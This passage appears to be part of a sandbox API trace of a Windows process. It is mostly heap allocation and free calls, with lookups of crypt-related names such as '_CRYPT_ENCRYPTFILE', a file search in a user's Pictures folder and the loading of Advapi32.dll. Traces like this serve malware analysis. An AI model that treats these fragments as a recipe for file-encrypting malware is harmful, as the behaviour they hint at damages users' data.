(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0096.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0096.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0096.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0096.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0096.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0096.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0096.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0096.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0096.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0096.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0096.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0096.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0096.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0096.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0096.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0096.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0096.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0096.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0096.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0096.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0096.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0096.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0096.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0096.067] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0096.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0096.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0096.068] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0096.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0096.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0096.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0096.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23f0 [0096.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0096.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0096.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0096.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0096.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2500 [0096.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0096.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0096.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0096.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0096.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0096.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0096.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0096.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0096.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0096.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0096.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0096.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0096.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24b0 [0096.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0096.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0096.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0096.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2460 [0096.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0096.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0096.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0096.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f50 [0096.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0096.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0096.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0096.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f80 | out: hHeap=0x1780000) returned 1 [0096.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0096.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f80 [0096.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0096.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0096.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0096.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0096.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0096.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0096.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0096.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0096.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0096.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0096.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0096.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0096.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0096.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0096.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0096.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0096.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0096.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0096.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0096.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0096.071] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0096.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0096.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0096.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0096.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0096.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0096.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0096.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0096.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0096.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0096.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0096.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0096.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0096.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0096.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0096.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0096.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0096.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0096.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0096.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0096.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0096.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0096.071] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0096.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0096.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0096.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0096.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0096.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0096.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0096.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0096.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0096.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0096.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0096.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0096.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0096.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0096.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0096.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0096.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0096.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0096.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0096.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0096.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0096.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0096.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0096.072] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0096.072] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0096.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0096.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0096.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0096.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0096.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0096.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0096.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0096.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0096.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0096.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0096.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0096.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0096.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0096.073] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\desktop.ini", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51311410, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac600 [0096.073] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0096.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0096.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0096.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0096.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0096.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0096.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0096.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0096.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0096.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0096.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0096.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0096.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0096.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0096.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0096.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0096.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0096.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0096.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0096.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0096.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0096.074] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0096.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0096.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0096.074] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0096.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0096.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0096.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca190 [0096.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0096.075] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0096.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0096.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0096.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0096.075] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0096.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0096.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0096.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2b0 [0096.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0096.075] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0096.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0096.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0096.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0096.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0096.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0096.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0096.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0096.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0096.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0096.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0096.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0096.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0096.076] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0096.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0096.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0096.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0096.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0096.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0096.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0096.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0096.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0096.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0096.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0096.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0096.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0096.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0096.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0096.076] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0096.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0096.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0096.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0096.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0096.077] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0096.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0096.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0096.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0096.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0096.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0096.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0096.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0096.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0096.077] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0096.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0096.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0096.077] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0096.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0096.077] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0096.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0096.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0096.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0096.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0096.077] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 